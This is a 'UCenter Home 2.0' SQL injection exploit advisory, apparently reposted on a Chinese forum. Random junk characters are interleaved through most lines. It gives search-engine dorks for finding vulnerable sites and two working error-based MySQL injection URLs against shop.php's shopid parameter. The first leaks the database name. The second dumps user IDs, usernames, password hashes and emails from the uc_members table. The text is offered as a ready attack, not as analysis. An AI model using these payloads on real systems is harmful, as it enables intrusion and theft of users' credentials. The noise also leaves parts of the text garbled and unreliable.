, f( t5 [; [ k
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
0 q* s! P r% b1 _+ h' {% v. S9 b( G1 U) o F& N6 }" J
- d* h. S* m4 F5 D
& B1 I0 p& ~+ w/ O0 b*/ Author : KnocKout
5 O( V+ U4 q) n: |7 T! |* Q+ z2 m2 o) ?( @
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
& ^+ G- \* v& C3 d) e. A, D3 w6 N, C' K9 q$ L
*/ Contact: knockoutr@msn.com
0 A& _9 h8 k2 l' F' S7 n# a4 ^2 r
" @0 d, M; z+ ~6 ~5 T*/ Cyber-Warrior.org/CWKnocKout 9 V9 U& J/ l% v) C
+ l2 a4 }& F1 y1 [5 S__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" Z/ ^1 N3 n% o/ j+ u: |- i+ C# y
Script : UCenter Home 5 z! ?! L' t& z9 d9 T2 y! g
; t2 l0 n6 ?7 L3 h8 Y, U* g2 eVersion : 2.0
2 Q+ i) t+ z7 g+ R! S
+ h/ u- Z# c% @# rScript HomePage : http://u.discuz.net/
% Y9 D. u3 \( I$ |! m- e, U9 a
! {& D! x) p% J6 a P__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" d, R" Z4 j( p8 Z& r1 b
1 C4 Q/ Q5 G" R* a# G' |Dork : Powered by UCenter inurl:shop.php?ac=view
& @- c @' d# g0 q( L" A+ k4 h1 ?6 X7 N
, f. P9 }/ U& P- H+ n1 RDork 2 : inurl:shop.php?ac=view&shopid= # I. N, P- r e/ z* Q
4 y; ^$ A+ l) c7 I& ]/ ^__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
% r: F8 A* z: X- z G+ V% J: H5 ^; R6 ^8 g% [5 F6 `
Vuln file : Shop.php . C2 n9 b7 ]0 F4 X/ w6 K
: L' R( R V9 X/ @- Rvalue's : (?)ac=view&shopid= ! ^, z. s q e- ?
$ J2 V% L; U% i: sVulnerable Style : SQL Injection (MySQL Error Based)
. r2 C" T8 W$ c9 y- w9 D/ @8 o" v) {2 ^0 g
Need Metarials : Hex Conversion
, \& q5 t: Q, D+ n7 m/ O9 e5 n
# Z+ g& e" I" W/ r# M__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
% G* G4 Q8 \+ T# X" T) j$ v
4 d$ Q4 }) g) uYour Need victim Database name.
' \' C, v1 N$ {$ e& R3 D) B4 E
0 C5 D4 v. K/ s( ], a/ Jfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 , f# r8 u9 i- O2 {, [
! }$ A4 {% G$ _8 ^2 S# r: `3 M.. 0 Z- ]; w' h/ Y8 s$ _- d
: ]0 z" R+ o6 Y" o) ]+ iDB : Okey.
; y; D2 n, n: j7 N \8 n
8 c! @; r( R( @9 Q) T4 H9 K) t1 ^your edit DB `[TARGET DB NAME]` 6 N k$ G0 ]/ m
6 W; ` v3 y0 T1 w e* ]- i, ~# ^
Example : 'hiwir1_ucenter' ( l2 e% c, c( {% B
) |5 [* L5 h8 n! E! ^
Edit : Okey. ; _* c+ X$ `( m- {' a
1 b a5 E S8 l6 s# p
Your use Hex conversion. And edit Your SQL Injection Exploit..
) ?/ F" b3 ]! g2 s9 H6 {$ K c% r2 Y8 g: S$ |, _( O
* @( ~4 j0 C2 V6 D9 K; p2 C3 p# O4 I. A8 v' |) F/ R9 p
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 , `7 f s2 _+ f% n
|
发表于 2013-2-27 21:31:31
收藏
支持
反对